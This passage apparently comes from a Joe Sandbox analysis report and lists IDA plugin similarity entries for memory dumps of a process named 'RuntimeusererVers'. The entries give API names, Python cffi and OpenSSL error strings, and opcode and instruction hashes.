                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format__stdio_common_vsprintf
                                                                                                                                                                                                                                          • String ID: initializer for ctype 'char16_t' must be a unicode string of length 1, not %.200s$larger-than-0xFFFF character$unicode string of length %zd
                                                                                                                                                                                                                                          • API String ID: 3682193652-3085492373
                                                                                                                                                                                                                                          • Opcode ID: 52ca9b23bcfd8f8cab6084793f029323c052d83e94fd4426ba8668ae24ccb4d4
                                                                                                                                                                                                                                          • Instruction ID: 28926b717d00931341aed25cae592d9154c7d0f64216eb51711cd7fe6a67a04c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52ca9b23bcfd8f8cab6084793f029323c052d83e94fd4426ba8668ae24ccb4d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81311C31A08E83C1EA64CB15E8603FA63A0BF847E4F940732E58D466A6DF2DF949C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _errno$_strtoui64
                                                                                                                                                                                                                                          • String ID: number too large
                                                                                                                                                                                                                                          • API String ID: 3513630032-2371285140
                                                                                                                                                                                                                                          • Opcode ID: f4f0d9f875116f828e727b9560b47cabe727a27147d51a212f0c82eebad44282
                                                                                                                                                                                                                                          • Instruction ID: 90556e6c67598c69c490b6e99669107abc6addf215ded64211ec49be68ffd918
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4f0d9f875116f828e727b9560b47cabe727a27147d51a212f0c82eebad44282
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29212F73B08B4586FB658F68D9242B936A1EB54BF4F008332CA6D426D4DF7CF489C601
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_FromLong_SizeSsize_tStringTuple_
                                                                                                                                                                                                                                          • String ID: offsetof() expects at least 2 arguments
                                                                                                                                                                                                                                          • API String ID: 1664805531-4287892465
                                                                                                                                                                                                                                          • Opcode ID: 0aac321aa76f28835fffac16962d97e7dc2c4fdb10ca844d7bc8ae6aa44c90bf
                                                                                                                                                                                                                                          • Instruction ID: 9e2ffb34e13d834fd9250e7b223779c2e90a0fa01557c48397a5fb22e98ad6fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0aac321aa76f28835fffac16962d97e7dc2c4fdb10ca844d7bc8ae6aa44c90bf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38115E36B19E5285EB188B25E8602F92360FB89BE8F481131EF4E47B45DF6DF4918710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format
                                                                                                                                                                                                                                          • String ID: ctype '%s' is of unknown alignment$found for ctype '%s' bogus alignment '%d'
                                                                                                                                                                                                                                          • API String ID: 376477240-1437467885
                                                                                                                                                                                                                                          • Opcode ID: 7da325989d51f7c952bd6650dc30b0e227f9944e9dd3773637a65bd858782347
                                                                                                                                                                                                                                          • Instruction ID: be139c93225e6f952acce6f0f47bbacb231b672c46b7705fe3165930439ea09a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7da325989d51f7c952bd6650dc30b0e227f9944e9dd3773637a65bd858782347
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B113D71A0890682FB588B26D8647F82761FB95BB8F441235DB1E476D0DF2DF895C340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1767461275-1080266419
                                                                                                                                                                                                                                          • Opcode ID: 9c69d3e6be98beb030fa5cf9360c523eb2394a07a3783dabf1ec6d20db28155b
                                                                                                                                                                                                                                          • Instruction ID: ab0b5a8d1ea912c947c255595fb0e88c7ec6c5644dc358387b07817a4c2c3d50
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c69d3e6be98beb030fa5cf9360c523eb2394a07a3783dabf1ec6d20db28155b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5117071B19E4A86EF64DB60D8016A937A1FBD0B94F804234EA0C43794EF7DF65ACB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_numL_sk_valueR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 2441919041-1080266419
                                                                                                                                                                                                                                          • Opcode ID: 5415ebd0a2a311cff0cfd4e2741985f30a92c4591782a12986c32579658e7ad6
                                                                                                                                                                                                                                          • Instruction ID: 392b1748e44c732b6832d62189f02159f9651e4272fae20ad8eca5d7032163ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5415ebd0a2a311cff0cfd4e2741985f30a92c4591782a12986c32579658e7ad6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C01D431F0CE4681FB689769E48126A5390BFC47D0F154235FE5C8778ADE2DF9428700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Arg_FormatKeywords_OccurredParseSizeTuple
                                                                                                                                                                                                                                          • String ID: integer constant '%.200s' not found
                                                                                                                                                                                                                                          • API String ID: 2363003521-2598228679
                                                                                                                                                                                                                                          • Opcode ID: a3beaaaef79378ae0539c8e990d242983b62a3d177d6dd601fd64efc4fd76a7a
                                                                                                                                                                                                                                          • Instruction ID: 64cd577dae95b337472b88715d85f6effab67076d266e76f58bbbb99adf1d6d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3beaaaef79378ae0539c8e990d242983b62a3d177d6dd601fd64efc4fd76a7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E01FB55B19E5681EE188B66EC205F9A390AF89BF0B440635DD0D47764EE7DF189C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatString
                                                                                                                                                                                                                                          • String ID: buffer assignment index out of range$must assign a bytes of length 1, not %.200s
                                                                                                                                                                                                                                          • API String ID: 4212644371-1215531179
                                                                                                                                                                                                                                          • Opcode ID: 547bacef6ee7c256ec57929aefd8f49671a69ba6bd1c939d5da096005b565525
                                                                                                                                                                                                                                          • Instruction ID: 9ab1b96fd003b3bf0e609b9d11880f8ce74ae89617283102e495a483da35447f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 547bacef6ee7c256ec57929aefd8f49671a69ba6bd1c939d5da096005b565525
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00014475B09E06C1DA0C9B29DDA01B433A0BB94BF5F544732D91D473A0DE2DF099C301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Size$Arg_BuildErr_ParseStringTuple_Value_
                                                                                                                                                                                                                                          • String ID: (On)$O!O|i:typeoffsetof
                                                                                                                                                                                                                                          • API String ID: 1294453720-945657874
                                                                                                                                                                                                                                          • Opcode ID: 3cc9d43e81b85417d784e4209241acbb7aa00bb9e3ead493c1ed6bd6addbf869
                                                                                                                                                                                                                                          • Instruction ID: cf823fb61eb3fe591edd73227dc73e58d4c33fe3ba83a3e19ee604d408590b19
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cc9d43e81b85417d784e4209241acbb7aa00bb9e3ead493c1ed6bd6addbf869
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7501E475A19F4692DE04DB51E8601EA67A1FB857E4F801236EA8E43B68DF3CF149CB40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_typeDeallocFormatFromJ_nid2lnUnicode_X_md
                                                                                                                                                                                                                                          • String ID: <%U %s object @ %p>
                                                                                                                                                                                                                                          • API String ID: 2860719311-1790359138
                                                                                                                                                                                                                                          • Opcode ID: c2a5dab8121edd43cdfa7764d4cf20064ff82ec5b9d53d542556ad782ff0f18b
                                                                                                                                                                                                                                          • Instruction ID: 9ca0c9fb6b98334dc8d731c8385c75a3509cecdd01b863a6a1eda276aea94b97
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2a5dab8121edd43cdfa7764d4cf20064ff82ec5b9d53d542556ad782ff0f18b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83F05E21A09E8786EE58CB52F918878A3A0AF58FF4B144635DE1D177A4EE3CF4E48340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_get_versionL_is_init_finishedstrcmp
                                                                                                                                                                                                                                          • String ID: unknown
                                                                                                                                                                                                                                          • API String ID: 1061301088-2904991687
                                                                                                                                                                                                                                          • Opcode ID: d76812424b0fc488a2bebf10abe3f3a18cc8ba379a370e54e01c572558e4ac69
                                                                                                                                                                                                                                          • Instruction ID: 8df5076c86b8f3e31fac6d357e3a95fe9fb201d4486ceb4b1aad2ae976af9dfa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d76812424b0fc488a2bebf10abe3f3a18cc8ba379a370e54e01c572558e4ac69
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1F01C11B0DD0681FE199F96A89013523A1EF48BF6F881231CD1E46354DE2CF4E2D300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_typeDeallocFormatFromJ_nid2lnUnicode_X_get_md
                                                                                                                                                                                                                                          • String ID: <%U HMAC object @ %p>
                                                                                                                                                                                                                                          • API String ID: 3107003933-749664232
                                                                                                                                                                                                                                          • Opcode ID: 823f7f4223b6ea06d6d4820c057e660dc204683fd4f0f0d394d23a59cb4c9db1
                                                                                                                                                                                                                                          • Instruction ID: c0e26d3ace3b9f917fbc94cef14663d92030318122521fc9f87073534535f7bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 823f7f4223b6ea06d6d4820c057e660dc204683fd4f0f0d394d23a59cb4c9db1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57F03021B09F4385EE189F56F95847963A1AF48FE4B584635EE1E07795EE3CF4E08300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_typeDeallocFormatFromJ_nid2lnUnicode_X_get_md
                                                                                                                                                                                                                                          • String ID: hmac-%U
                                                                                                                                                                                                                                          • API String ID: 3107003933-3757664071
                                                                                                                                                                                                                                          • Opcode ID: 38543325c9a58b19710b73aaee43961f9cfd1a21f3fd3a664d110f44dce9644c
                                                                                                                                                                                                                                          • Instruction ID: 126d54c4108aa2841fa76bef687c332e779ed1281ec74837f0c3908c6f665fef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38543325c9a58b19710b73aaee43961f9cfd1a21f3fd3a664d110f44dce9644c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6F03021E19E4381EE149B16B8588786391BF54BE0B481634DD1E17754EE2CF4B18340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$Bytes_Err_FromO_ctrlSize
                                                                                                                                                                                                                                          • String ID: Not a memory BIO
                                                                                                                                                                                                                                          • API String ID: 2349510700-587638661
                                                                                                                                                                                                                                          • Opcode ID: b60ed83ce2f0985fa24d11a78c25c5d94ca5767b0ee071f989f2ef44ddd40a44
                                                                                                                                                                                                                                          • Instruction ID: 2410ef48c6bddc2777dcfb83992f52512d36b262ea0a3ce77fe1f37d95d5398c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b60ed83ce2f0985fa24d11a78c25c5d94ca5767b0ee071f989f2ef44ddd40a44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF03065E2AD02C2FB54DB21E8547796361FF84BF2F805231D91E46958CF3CF0888700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$ConditionEnterVariableWake
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3011652882-0
                                                                                                                                                                                                                                          • Opcode ID: 82922e0a7e61720e50d7940cf6154baf25e46f35d3028d8fe33b5c55c42d3da3
                                                                                                                                                                                                                                          • Instruction ID: 23d3b225cad20ed0a308b914ae323ce027f2f19364a0e63aaf3d4eec9b4bea31
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82922e0a7e61720e50d7940cf6154baf25e46f35d3028d8fe33b5c55c42d3da3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12C1F433A04F9482D7558F29D5402A873A0F758BA8F189636DF8E0B765EF34E5E2C390
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
